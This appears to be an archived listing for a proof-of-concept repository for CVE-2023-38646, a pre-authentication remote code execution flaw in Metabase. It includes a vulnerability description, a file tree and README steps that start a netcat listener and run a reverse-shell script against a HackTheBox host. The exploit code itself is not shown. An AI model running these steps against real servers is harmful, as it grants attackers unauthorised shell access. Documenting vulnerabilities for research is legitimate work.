CVE-2023-38646 PoC — Metabase 安全漏洞

Source

https://github.com/asepsaepdin/CVE-2023-38646

Associated Vulnerability

Title:Metabase 安全漏洞 (CVE-2023-38646)
Description:Metabase是美国Metabase公司的一个开源数据分析平台。 Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞，该漏洞源于允许攻击者以运行该服务的权限在服务器上执行任意命令。

Readme

<h1 style="font-size:10vw" align="left">CVE-2023-38646 - Metabase Pre-Auth RCE</h1>

<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-9.8 CRITICAL-red"> <img src="https://img.shields.io/badge/Vulnerability%20Types-%20Remote%20Code%20Execution-blue">
*****
⚠️ *For educational and authorized security research purposes only*

## Original Exploit Authors
Very grateful to the original PoC author [securezeron](https://github.com/securezeron)

## Step Guides
1. Set Up the Listener on your attacker machine:
   
    ```bash
    nc -nlvp 4444
    ```
    
2. Then, run this command:
   
    ```bash
    python3 CVE-2023-38646-Reverse-Shell.py -h
    python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
    ```
    ![image](https://github.com/asepsaepdin/CVE-2023-38646/assets/122620685/6ef79e16-ac2f-4488-8ed4-6f8c4037eac6)

## Credits
- https://nvd.nist.gov/vuln/detail/CVE-2023-38646
- https://medium.com/@starlox.riju123/hackthebox-analytics-metabase-rce-bd3421cba76d
- https://www.youtube.com/watch?v=br7JZzcTDG0

File Snapshot


 [4.0K]  /data/pocs/6aca0562ab5e802152f87987030ed373eae33dc6
├── [2.0K]  CVE-2023-38646-POC.py
├── [4.0K]  CVE-2023-38646-Reverse-Shell.py
└── [1.1K]  README.md

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!